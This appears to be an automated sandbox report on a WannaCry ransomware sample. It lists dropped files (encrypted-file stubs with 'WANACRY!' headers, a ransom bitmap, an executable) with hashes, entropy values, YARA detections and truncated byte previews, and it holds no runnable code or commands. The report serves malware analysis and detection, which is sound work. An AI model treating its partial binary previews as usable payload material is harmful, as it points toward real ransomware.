                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.8128587573164126
                                                                              Encrypted:false
                                                                              SSDEEP:24:FuGLlFiXV3MWug79Ohaw6Bg/34PiAsIFr5w:FuGBQ2sa/IX5w
                                                                              MD5:B1530C31B6BF572C5A6C2DCA8C88DE4B
                                                                              SHA1:DD95B075BB58EBCFCE45698170F295256B41938E
                                                                              SHA-256:604D2B683E416453322BF02435AC97230632BED259FFF90247E670FAAC68088C
                                                                              SHA-512:80907F40E4129ABE4FDEBF2A747EC5374D30CA555C91B2A96ED4494E3D936DBE30125808DCFC1CD1BB239CF3D214B4EBBDBD1A60F2576EE5B697D6F565F03516
                                                                              Malicious:false
                                                                              Preview:..J.....|)6^{.r....T.e.V...Rd*..IS%..i0..1..V#..[.......a....C\U.....i)o....S.a.5...i^..... R...H.mr...T.......`a.Z.....d..'q...^....n.[.]...D....8.-.%NZ..x..1...n..W..D.q.....J.....J3..+.|~I..G..{..Z..T....B!...Z...\....1k.?... GU......}..l...4....~....n..mE.Uq.f.+...`V..&.0..%t9..X...\pp.b..../.._$<o.....z.../...n........Nb.A..%.SR.".n.?.q.?{'!..yF4..(.{.'a_..../..j~....s.1......M-.R......]O....8.jwR......p...W.oX..b..W[.(.S.{..Q.....O..A.......(f...&..........\..1........KJ."o...}P..N}....YmA... 1....9.).5B..sZfI...e.~..@..!..'.H.t..)uih^.J......sF.C..p7Q.m..\.._T.....J....)e....?X<.y0.....h..o..s.4t.Ra..)L+=,.)F{.....(4=>L.......A4....)......W.@.>....`.}.)......{r....9.......Y..41.P..)oA...h..#...Y..;]$.....<Q.I..s....*..yrh$>G..np.%O..Y..TM.zzdF........+.!.w.......\-<C].$..1o:z.s.....{.G9N.....k.r..!...cO.x..3..hy.<..........4.$Jj...n..Y...eQH.0r.m[..U.9.=7X...|.wt.V.$Z>....;..P......6#K.v......*.c........S....|..',..M..u..;.0.v%/.=5.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.84089012175023
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkz8tFbXiC4nquQ8GBJpimYuXxzI1FSAy/905qfEnRtRVNCOWSsB3Zt:bkgt5XiLbQ8uJpimRxc1Fpy/i5qMRnV8
                                                                              MD5:F903C0F0CF375578AC4C347E2BCC2E52
                                                                              SHA1:C99AD91CBB4CD555C2920F83ECB7EFA6C2A6B2B9
                                                                              SHA-256:04050853FE8E9F7345A675CC258ED162AC8E388CD3EC08A4FA01898AEB880458
                                                                              SHA-512:B081F2B7C0C5D05055EE9148E05C3432FD70176940FA9A8C87164B8D05C9F9008B74F5EB9EC6C8F94D16B89C8F66EED014CCEEE3B5E96C03AB60BBBE58263B45
                                                                              Malicious:false
                                                                              Preview:WANACRY!....x=...]...nI.".C.....j3...........{.7.<..ra*.......A....oZ...\.t...CBZ....x....$..9..JxN.f..:.v...i....d.h...Df.`N+L....u.....C.y....0.v.Nk.\#..,0.8.....~.N...!.1..D...../.....ahz{.+'........<"..............F"."..(...9j.....C..}H..gjJ}vr;.............N4..4...xl....p[..w.b..Vz...Q..o...\."..#...k.x...331...L!.t...J..qQ.j... ...."6.n....B.@.]~0....._....3....`..gc...L...M.t...Nd/...X.....[o.B..#q..*.j...i...+".l_.W.!....*.J..j..;........%...........,..'h+a5&.3[.:.....i...@.@d./.6L..D....'.....K..6.9.5..Q.....$t.]......B..t.!/d.bH...u$..>,m...^.e'...<z.2..q{$....A.).1.:Wi.H.O}..x..=...4u..T.Jbd..i.h....%.9L.w.f._Y.Z."..@h..g.=PN..0k..'.D+$...k.g....e...W. .v.mx. v.N.Zh`._.kw}.N...._....zg...Z..LD]....".p(,...s....V0...i=...p..?+".Ogg..,.S..(....[.....4W.].\.g.dwe\.$..#..._k.&E,~..A...,lW{RW....|.....$V..5.eI.....D.iIQbB....+...i.H@.N:....GN.,....u.....*'j..W.WsI{.....1.R..f!.W.'P..H'.<).........G'.A....5..>.d.}.h..U.1..A.M~1..?.j.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.84089012175023
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkz8tFbXiC4nquQ8GBJpimYuXxzI1FSAy/905qfEnRtRVNCOWSsB3Zt:bkgt5XiLbQ8uJpimRxc1Fpy/i5qMRnV8
                                                                              MD5:F903C0F0CF375578AC4C347E2BCC2E52
                                                                              SHA1:C99AD91CBB4CD555C2920F83ECB7EFA6C2A6B2B9
                                                                              SHA-256:04050853FE8E9F7345A675CC258ED162AC8E388CD3EC08A4FA01898AEB880458
                                                                              SHA-512:B081F2B7C0C5D05055EE9148E05C3432FD70176940FA9A8C87164B8D05C9F9008B74F5EB9EC6C8F94D16B89C8F66EED014CCEEE3B5E96C03AB60BBBE58263B45
                                                                              Malicious:false
                                                                              Preview:WANACRY!....x=...]...nI.".C.....j3...........{.7.<..ra*.......A....oZ...\.t...CBZ....x....$..9..JxN.f..:.v...i....d.h...Df.`N+L....u.....C.y....0.v.Nk.\#..,0.8.....~.N...!.1..D...../.....ahz{.+'........<"..............F"."..(...9j.....C..}H..gjJ}vr;.............N4..4...xl....p[..w.b..Vz...Q..o...\."..#...k.x...331...L!.t...J..qQ.j... ...."6.n....B.@.]~0....._....3....`..gc...L...M.t...Nd/...X.....[o.B..#q..*.j...i...+".l_.W.!....*.J..j..;........%...........,..'h+a5&.3[.:.....i...@.@d./.6L..D....'.....K..6.9.5..Q.....$t.]......B..t.!/d.bH...u$..>,m...^.e'...<z.2..q{$....A.).1.:Wi.H.O}..x..=...4u..T.Jbd..i.h....%.9L.w.f._Y.Z."..@h..g.=PN..0k..'.D+$...k.g....e...W. .v.mx. v.N.Zh`._.kw}.N...._....zg...Z..LD]....".p(,...s....V0...i=...p..?+".Ogg..,.S..(....[.....4W.].\.g.dwe\.$..#..._k.&E,~..A...,lW{RW....|.....$V..5.eI.....D.iIQbB....+...i.H@.N:....GN.,....u.....*'j..W.WsI{.....1.R..f!.W.'P..H'.<).........G'.A....5..>.d.}.h..U.1..A.M~1..?.j.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.808663679158851
                                                                              Encrypted:false
                                                                              SSDEEP:24:TC9ClO887T4Rh9lMBdQ3ynb8iCnyMKFtLYAT:W970T3Qb8iCyMstlT
                                                                              MD5:DB4DD7B8F192D909C28EDF7D9BA98B2A
                                                                              SHA1:54B3F8F0CDC6E4B06003D6308299D35E2F8E689D
                                                                              SHA-256:08DE54C77EB89B9D439755DF41E86A833A30856A47BDC569130872C7D3B51C37
                                                                              SHA-512:895B67A10698025DDDDC686E1316FA03D1CB0C2D6618CAD15F1720E059175097FF3EB44918DBF3DF791F19F8A312AE3D6CB430F9B330ACAA799456246FACF39E
                                                                              Malicious:false
                                                                              Preview:..Z9.....B...>.".i.%.ZG._.....C.Q.-..sI.....i.X.J.`.I./.#....5KH;..w...Yx.g.H...Q...!.m..LP....Qq.....sW..x.lZ.es....r....o....OJ..F..\.. .....t.x..c..S[.`L2..c.WC.......&.A.%.{.y].Z...{.e....C...@F.T=...*..X...Q.......5...i..V.!.z..._,"'.....S.Z\.B.....j.>-]P....Y..#...*A..T.x1;.}0$.`.w....j..=.%c#/o<..C.M.)7.[6{Iu...5.&....V.2.....V..{T.VCRe....\.O..Ox9x....K....|..(.....&$.w/.5R=e..^...Ll..m..._Fo....nsr..n.|?.f...........}..m..h.....m.b>%..TrYN....a.=.....j......1.V...9y+@....$0.e9..;..|.....H)......B'..,M...o.....|^C5...^.n..p./..$w.^.>.~..i-..q/|D......<..Q.~.8....(.....6.$....%..\.T.3....i|..J..'..a..G..P5X.$.....>xdc.jh.1"..0....7..y^9...N.]..g........yI..gX."..?...B.q.....>...'......>.....N.e..B.$/..@2..-J.}...z....L.....#_2.L:....._.l..K...3..P.m.E.3.Yy|"}.*NF\&..X...:..8.z..6.._.RZn....(A .|.GR.H.+......Pr.=o<.....;fIW.A.....C!.]...j..".....L..;.1.....]..&..4|...<..._(..\....5.J.;(.=..C.....h.q.......(Vr..2m..yE|..`...-+."xD.9,....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.851199212092683
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk/to0xFyATpmnlP46dq+0nPgMpBnt8bQf9nwaw8eAv7nQqOhq93ZwS7FUW3j84R:bkFBnpBQ0nnt8bQk8eAvEJqRZ/G486DT
                                                                              MD5:6E3DF1BFA90E7D981A30C379B3A6DF25
                                                                              SHA1:1FC71D4772BB81CA99D8E1B2AF50E125D539E747
                                                                              SHA-256:7EAD2D7694302D33E683B037AE30BFAAEA871424D874E30173F61A7B2DBFBE6C
                                                                              SHA-512:88A6B08AC06E5BF8E841E33F4DF2ACB599F1D03215ACDC74045426E59E586B4979BA800C3972CD1B786D2254593BDBAA7D78C4CD0A37497AA71D1C4A28AC7A92
                                                                              Malicious:false
                                                                              Preview:WANACRY!......c:a..T..^..Jt.%.l..1.....*1.@..6.(...!.F."........%"..`.:).s.J.._y;X.. .0.D..l..@S..8.^..1.\.p..s3~U..E.k...mx.<<N".9].o..Z..5T.+;T..=..h^..o...{..h....G* ._.~AUB..)...A(r^..G?.+c7R..i..{....?A..{*,.RZ..3.+.;}."....5.E....!`............r...1z............b...0......4..r..7.X9[....i...W..FU.5.Y.Z...r+.l..6or2.%..]5..Tab.s.1A...+....&.6W..?.D..`Z...Q.bA.:....)}..}.E.......^..6.{*x....8.-C..?.kr..x1%i.........n.....uF.{c#.......X".:.,].....6...r.....'...1..WQj.A.N&Qxuw.\....C`XQ.x.._.tB......a..QI.;Ky..>.<....%.E}..4.f.Z..u.=v%.~....*.WHBu.A$.`....dG..I.d..I......l7....s.!p|...H.cl.".8.,;..;H....JT.8.(F.]......!.j.T]W...V.Q...A.K...(.@..TtZE?.}#.o..{.2z<....G....P5.b.$?.j...|..eq/..... .z'..bm.:.G..|.:_F..d.+.Y..j...D.#.W..T.k.....;....3...*.2...p...e...i....q4.......;.C.ITc.I.EK.<.........:G._TK.v>.~..few..G........H..[2.v...........jj.._...s......".8.F..4...p..&..Y...3...0|....u.$....3./n......@.[I..yz.e. .Y.f\.Y.Z"i.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.851199212092683
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk/to0xFyATpmnlP46dq+0nPgMpBnt8bQf9nwaw8eAv7nQqOhq93ZwS7FUW3j84R:bkFBnpBQ0nnt8bQk8eAvEJqRZ/G486DT
                                                                              MD5:6E3DF1BFA90E7D981A30C379B3A6DF25
                                                                              SHA1:1FC71D4772BB81CA99D8E1B2AF50E125D539E747
                                                                              SHA-256:7EAD2D7694302D33E683B037AE30BFAAEA871424D874E30173F61A7B2DBFBE6C
                                                                              SHA-512:88A6B08AC06E5BF8E841E33F4DF2ACB599F1D03215ACDC74045426E59E586B4979BA800C3972CD1B786D2254593BDBAA7D78C4CD0A37497AA71D1C4A28AC7A92
                                                                              Malicious:false
                                                                              Preview:WANACRY!......c:a..T..^..Jt.%.l..1.....*1.@..6.(...!.F."........%"..`.:).s.J.._y;X.. .0.D..l..@S..8.^..1.\.p..s3~U..E.k...mx.<<N".9].o..Z..5T.+;T..=..h^..o...{..h....G* ._.~AUB..)...A(r^..G?.+c7R..i..{....?A..{*,.RZ..3.+.;}."....5.E....!`............r...1z............b...0......4..r..7.X9[....i...W..FU.5.Y.Z...r+.l..6or2.%..]5..Tab.s.1A...+....&.6W..?.D..`Z...Q.bA.:....)}..}.E.......^..6.{*x....8.-C..?.kr..x1%i.........n.....uF.{c#.......X".:.,].....6...r.....'...1..WQj.A.N&Qxuw.\....C`XQ.x.._.tB......a..QI.;Ky..>.<....%.E}..4.f.Z..u.=v%.~....*.WHBu.A$.`....dG..I.d..I......l7....s.!p|...H.cl.".8.,;..;H....JT.8.(F.]......!.j.T]W...V.Q...A.K...(.@..TtZE?.}#.o..{.2z<....G....P5.b.$?.j...|..eq/..... .z'..bm.:.G..|.:_F..d.+.Y..j...D.#.W..T.k.....;....3...*.2...p...e...i....q4.......;.C.ITc.I.EK.<.........:G._TK.v>.~..few..G........H..[2.v...........jj.._...s......".8.F..4...p..&..Y...3...0|....u.$....3./n......@.[I..yz.e. .Y.f\.Y.Z"i.
                                                                              Process:C:\Program Files\7-Zip\7zG.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):3514368
                                                                              Entropy (8bit):7.995470941164686
                                                                              Encrypted:true
                                                                              SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
                                                                              MD5:84C82835A5D21BBCF75A61706D8AB549
                                                                              SHA1:5FF465AFAABCBF0150D1A3AB2C2E74F3A4426467
                                                                              SHA-256:ED01EBFBC9EB5BBEA545AF4D01BF5F1071661840480439C6E5BABE8E080E41AA
                                                                              SHA-512:90723A50C20BA3643D625595FD6BE8DCF88D70FF7F4B4719A88F055D5B3149A4231018EA30D375171507A147E59F73478C0C27948590794554D031E7D54B7244
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\WannaCry.bin, Author: Joe Security
                                                                              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Users\user\Desktop\WannaCry.bin, Author: Florian Roth (with the help of binar.ly)
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Users\user\Desktop\WannaCry.bin, Author: us-cert code analysis team
                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\WannaCry.bin, Author: ReversingLabs
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 95%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3483686
                                                                              Entropy (8bit):7.99939462751393
                                                                              Encrypted:true
                                                                              SSDEEP:98304:Wn8cFn8cFn8cFn8cFn8cFn8cFn8cFn8cFn8cFn8cFn8cFn8cFn8cFn5:6VVVVVVVVVVVVD
                                                                              MD5:08D69599C749CE7EE75D2753B7C489CB
                                                                              SHA1:648DA1D938FB572D6245BEFFB5BB082948279A4E
                                                                              SHA-256:A36C62383E16E997B51F99126832874DE522A3D15E835AD7A882E8285AA681D1
                                                                              SHA-512:CBDE7DE24F91B5DAEBC481FEB5D51CBEE15B785D58D682AEB9C85BBB17284B97DA6EA802098EA888D3AA838060D6D0CE74209CF8C3728FC38FF6CD301886B1C3
                                                                              Malicious:true
                                                                              Preview:.;`..Q."?.n.'.."....@..g....7.....l.*.F...."(...B.5....}....Q..ea...c......9.D(Rl.2.Z.0.oCc?=M..&.K..t..l..\GM.]F...fm......Z.R..\.6.n|.%...).....J...,..b|~k.V3.....G.r...t$.........M.....-...'i2zl...m..GG.:..|N!D.G.^.y9D..C.#H......^p.>.x..X.._..o.n...a..%P<3zf.H..@.VK...PO..I.j..X....s....+.......k..s<...0..u%...[Mv.......'......X...w.h....Zh.6..s2.U.....U...p~"[......;e.P.P.....2.....<!.l...\..o......0>.^..r,#.G..N~....rW.:.R..|J.GT.j....*....Xo.J..9..oid.p. e{#...!v.&.K ......f.T'.:.:$...e.7..Z.....m/..#........\H.^!(ty.Q..2.V....i.....6...N........%.....y..5.w.3.0...T...d\'}.fp...".0 ....S.'..x...'.......@.....k...n...C..'...+..;.;..+...5.E....."..=./.sv.%..<f...._.V^Z.q...u..eH..}!.1....F`..BD.....9.-....;9...dhf'...!q.".aG...|..%..T5H.t..*JN......vqW.r....m....0hU.U..t={...._Rb`.......... .}..%....V...%...9%VB.mX/Vd.#L.l.....T.....H`X.t...4....>!...^5vX(.q\...l..A.k..x..`7h...hE.qb..2r..)..S.S.....ee../.e..p..m!...ory.........C%..C5.....;
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3483976
                                                                              Entropy (8bit):7.999951891132154
                                                                              Encrypted:true
                                                                              SSDEEP:98304:Kw/Fgaqhuswk6OhOm2XXJ3MUQAm8PHK+yOU4OXtV+M5Mu:lNgaqovk6ypGXtTQAm8/nU4OdV/5Mu
                                                                              MD5:CEFAA2C8DB5AC368FA1059005EB3E741
                                                                              SHA1:4F315E373829BF9C8DF0D4154A41C8101AEAB41B
                                                                              SHA-256:7D0DC343BB1DC28C583578F512A6EE1C801C7F69AD5A17D5255F2D068968D6C7
                                                                              SHA-512:688B7587C0416CC6C3D7110515668FACE96EA03C738337DA36106631065392839CDCA300983FCC36391510C267A37D0E7E0AD5D84981ADD780623A98B1987E9B
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......KKv..3).,.b.^{pd9..n..C..u.....)%.S...G.........?.F4..3DO...Y.).*.%..S^.k...-..s.G.`.*...kF.....V.fV...X.h7y(.2..p:.@.dd....a.4t..Q..H*C.P;=...1..az...*`[../b.}w....m..n."._.~.d......oc.....z...T..|.I........P......_..{+qs.w#.j..('-[..#?.s....O.....&(5.....(..c0...}...b ..8#:-......5.G.....A..2.`.tg.U..<c+...O.......w.5.Q-@C]...w...XtD5...=.t..8 ....aq......J.%r..B...En......!E.go..dtis.........,r\.....-.61.D.SK......J.W`...e9.[......=.To..;.U.o..r....]..K....m......W95Ai..... .......4T*...w4..a2%iP^..."O...M.=...u.=....F4m.!..WUAxr.bQ.p*..a?i.....hH..|<...:q'dRx...zv.M_.O_k-[;c7..v3o9;..i.y....Y`....%..~.8C..@...o...Wg.4 #rz...-..9-.&.?..ib.uh..jP.{...".i....y..A.r....t|.).^....t.}.CB..)v..u........-.....)A..N.<.?...^p..R....a...09.'#...^p.9...O+...3uQ...O....-}S\.X..J.E.T..U........S9h..D....0$..Y&w......)....6....cjCdm*.@....i.@[..n.c.QK.f.Bu..j.....!....B..Hyi.~.b....O[o.l....h....}..$.K.Ns...up...._..Q..O...$........J.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3483976
                                                                              Entropy (8bit):7.999951891132154
                                                                              Encrypted:true
                                                                              SSDEEP:98304:Kw/Fgaqhuswk6OhOm2XXJ3MUQAm8PHK+yOU4OXtV+M5Mu:lNgaqovk6ypGXtTQAm8/nU4OdV/5Mu
                                                                              MD5:CEFAA2C8DB5AC368FA1059005EB3E741
                                                                              SHA1:4F315E373829BF9C8DF0D4154A41C8101AEAB41B
                                                                              SHA-256:7D0DC343BB1DC28C583578F512A6EE1C801C7F69AD5A17D5255F2D068968D6C7
                                                                              SHA-512:688B7587C0416CC6C3D7110515668FACE96EA03C738337DA36106631065392839CDCA300983FCC36391510C267A37D0E7E0AD5D84981ADD780623A98B1987E9B
                                                                              Malicious:true
                                                                              Preview:WANACRY!.......KKv..3).,.b.^{pd9..n..C..u.....)%.S...G.........?.F4..3DO...Y.).*.%..S^.k...-..s.G.`.*...kF.....V.fV...X.h7y(.2..p:.@.dd....a.4t..Q..H*C.P;=...1..az...*`[../b.}w....m..n."._.~.d......oc.....z...T..|.I........P......_..{+qs.w#.j..('-[..#?.s....O.....&(5.....(..c0...}...b ..8#:-......5.G.....A..2.`.tg.U..<c+...O.......w.5.Q-@C]...w...XtD5...=.t..8 ....aq......J.%r..B...En......!E.go..dtis.........,r\.....-.61.D.SK......J.W`...e9.[......=.To..;.U.o..r....]..K....m......W95Ai..... .......4T*...w4..a2%iP^..."O...M.=...u.=....F4m.!..WUAxr.bQ.p*..a?i.....hH..|<...:q'dRx...zv.M_.O_k-[;c7..v3o9;..i.y....Y`....%..~.8C..@...o...Wg.4 #rz...-..9-.&.?..ib.uh..jP.{...".i....y..A.r....t|.).^....t.}.CB..)v..u........-.....)A..N.<.?...^p..R....a...09.'#...^p.9...O+...3uQ...O....-}S\.X..J.E.T..U........S9h..D....0$..Y&w......)....6....cjCdm*.@....i.@[..n.c.QK.f.Bu..j.....!....B..Hyi.~.b....O[o.l....h....}..$.K.Ns...up...._..Q..O...$........J.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.801300603535415
                                                                              Encrypted:false
                                                                              SSDEEP:24:wQqi9I+RcHYEj7XDpKZrMtUMMRhW1PHYJ8BArLCgR2:fqi9QHZkZrMtUMQhW1P46Kv/2
                                                                              MD5:0BBBE00125E479434B53A2B3B246BB27
                                                                              SHA1:B27F0BDF5B7C8D70B119E2218AD565787CE6C662
                                                                              SHA-256:3CDAE00C79C5D667D0BC61E72A5BF8CB7B807647306390B82FB886D183B17554
                                                                              SHA-512:4D18DEAB6F31B476BC3D8FD02BAA4117D1092F88D89F23B3145E64153C811E1242610C6E531AE948300CDCDEB1D6370AF5FB58FA693CD02B54C1649FDE2DAE92
                                                                              Malicious:false
                                                                              Preview:+.E-.&Hr.E..h.J..Gz .luM[....k....m.Z..Ui;.....Q...|.%4./.dh..'...>.....hV.a.v.I..R.)....a.Z.......G..@,$.7\..i...G..J..Y.h6)J.......J...W.=q...+o.._..^....Q..T...W.v.s..:.L.ja=lA.M...W.<u.....-.2.@e=.K.#B..`>.....y.....C}...8..0..xx.o....DS...-.{.'G.r/.....V.J...4g.N...t[W....i.]....".`S..Y...w...I....(. ..}4%..O.W...&.b.B.m.H....y6o :}._.,.+...k....,...{.L=.mEj.....bJW..c.a ..p......r.dk.C.G...)F.\.R4...j...>..U)Q..[...~.s..C...r_a.....K...[jv%'...N........K.8...w.$7..o....}$9..]..W...?....%"|..P.).g.9..o........;..!.lR....[S......'..d...fa....:.RY......h.....Y...&.Eo.?..7.<h.....;E.yV..bz?GA......ea...<..[S..(...Vk&z..j'....#D.|..0...[bU.L^...K....~pL.d..@.kB.).....M.LD#.XL"..k.....JQ...{..H..V.|...f.$ae..."...%@|....@.%....V._..>.<S.TDe...X/..^u/..Dh.5P.....s$V ..c.6.j^..WU..=2.....T.yz..y.E../.n.......W.]..).Y.......S...n.0..d`...y.*p...}]._}..R....n^..s]e....pD.mX...x!....2.E:..y.Pbk....7.....}..^;......NlR."..~.|e./v.d....+
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.850442424112378
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkrQb8BTsTw2qnpoG1bOfT2j70FIR8A/nFsLycBxD7loujiTq2R:bkcg8qn2ebOfMlV/ngycfZoujQ
                                                                              MD5:FD8CE64367C2565F07B1684967116EAD
                                                                              SHA1:EFEBC76747E281F60DED87E36EADA9F131955044
                                                                              SHA-256:BAFB00BFD4D60FDB896489FF50DF5BB1AFBB7E735C7656BB49322AEE1F9DEB37
                                                                              SHA-512:22F943F4AD0069FC882E2C6EC4A649EF61F9FC1FAABB5CABE2BB0CF387FD8B99AD3A455E3DFD43C2B3B635F66DD401691FC7B5545137BFF9E01B4EBB3363CC13
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......<.m.v'*.."..Pv.D.".....#...:)8... .!./<......L.O....+........6c[..(.'......3...m...U\L..<t.`m.:ru*..U,^....#O0.ox..i.?..4..J.l....f...|"..v.{...F.y.&....X.N....~..w...J/...iR.m8.F...v..k=v.u..;........%..4.q..R..;<.R......l.N...../<.i..S..U..N..............F..I.............*c.[-u.v.z^FV..8.1.a..!.m..a:.f......t..*}2....|......}:..f..2=....(...].}B.lH,W.o.2.._.Q..8....T..l.....M.L".1......9.S.... .6.J...Zic...b=...."sCYv....R....l..p...H.>49..*#.~.....N...t...I..g..0..3...^"...V...h...^.\.p~.z....;.$....K.wf......&.r=.U......TQ.^K.3#.rR..........kN...,..........r.b...!p..6>.'.U..."Q......,.m..(r...[k.8B&&..*{.W..a.(.Z...^....D6.+2l.&...n.b.t'.zOJ!7.K..../.....F.F;...93).2......P.;..Dp.(..cE..C.j......a....e.D.B.:.r."U....\}Ey.7U.@.&..2L.UO.=Q..-?....H&..Op...Z.rY.9,.Z...@o%...m....g.,.:.}.....$_..qC..[.fs}.U.Q.L.\I(6.J...4...}..SDO.~.6...."..aYuN....n.5.'.a.....@:.#i.....v....'.kA.3).wM}.[."}7.%...Q../...2M.7......l.K.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.850442424112378
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkrQb8BTsTw2qnpoG1bOfT2j70FIR8A/nFsLycBxD7loujiTq2R:bkcg8qn2ebOfMlV/ngycfZoujQ
                                                                              MD5:FD8CE64367C2565F07B1684967116EAD
                                                                              SHA1:EFEBC76747E281F60DED87E36EADA9F131955044
                                                                              SHA-256:BAFB00BFD4D60FDB896489FF50DF5BB1AFBB7E735C7656BB49322AEE1F9DEB37
                                                                              SHA-512:22F943F4AD0069FC882E2C6EC4A649EF61F9FC1FAABB5CABE2BB0CF387FD8B99AD3A455E3DFD43C2B3B635F66DD401691FC7B5545137BFF9E01B4EBB3363CC13
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......<.m.v'*.."..Pv.D.".....#...:)8... .!./<......L.O....+........6c[..(.'......3...m...U\L..<t.`m.:ru*..U,^....#O0.ox..i.?..4..J.l....f...|"..v.{...F.y.&....X.N....~..w...J/...iR.m8.F...v..k=v.u..;........%..4.q..R..;<.R......l.N...../<.i..S..U..N..............F..I.............*c.[-u.v.z^FV..8.1.a..!.m..a:.f......t..*}2....|......}:..f..2=....(...].}B.lH,W.o.2.._.Q..8....T..l.....M.L".1......9.S.... .6.J...Zic...b=...."sCYv....R....l..p...H.>49..*#.~.....N...t...I..g..0..3...^"...V...h...^.\.p~.z....;.$....K.wf......&.r=.U......TQ.^K.3#.rR..........kN...,..........r.b...!p..6>.'.U..."Q......,.m..(r...[k.8B&&..*{.W..a.(.Z...^....D6.+2l.&...n.b.t'.zOJ!7.K..../.....F.F;...93).2......P.;..Dp.(..cE..C.j......a....e.D.B.:.r."U....\}Ey.7U.@.&..2L.UO.=Q..-?....H&..Op...Z.rY.9,.Z...@o%...m....g.,.:.}.....$_..qC..[.fs}.U.Q.L.\I(6.J...4...}..SDO.~.6...."..aYuN....n.5.'.a.....@:.#i.....v....'.kA.3).wM}.[."}7.%...Q../...2M.7......l.K.....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                                                              Category:dropped
                                                                              Size (bytes):1440054
                                                                              Entropy (8bit):0.3363393123555661
                                                                              Encrypted:false
                                                                              SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                                                              MD5:C17170262312F3BE7027BC2CA825BF0C
                                                                              SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                                                              SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                                                              SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                                                              Malicious:false
                                                                              Preview:BM6.......6...(... ...X.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):780
                                                                              Entropy (8bit):2.383503101792111
                                                                              Encrypted:false
                                                                              SSDEEP:6:c5D+pZkaHqHgVcKKfF9mHRMMPRGS37LlN/sUQqGUSGeTsdEC:c+maRVcKKfm2MYS3sUQqGLGeTEV
                                                                              MD5:4B19680F592A4B25F65A38001B37C37E
                                                                              SHA1:21E79FDA46D3EB66750D888441A609F7EAC0D788
                                                                              SHA-256:BA6FC58D4188F06CC605C35E9FE79C426E8A99A782282BA55488F5AA00D30737
                                                                              SHA-512:4D94EB2765A92D43FE5B6CC87C3933E1350DE3851E2AD28960E5677864DB57898134CE9DE2CA113E973C2283803923771B74A8D01392575CFF646939A0AE2506
                                                                              Malicious:false
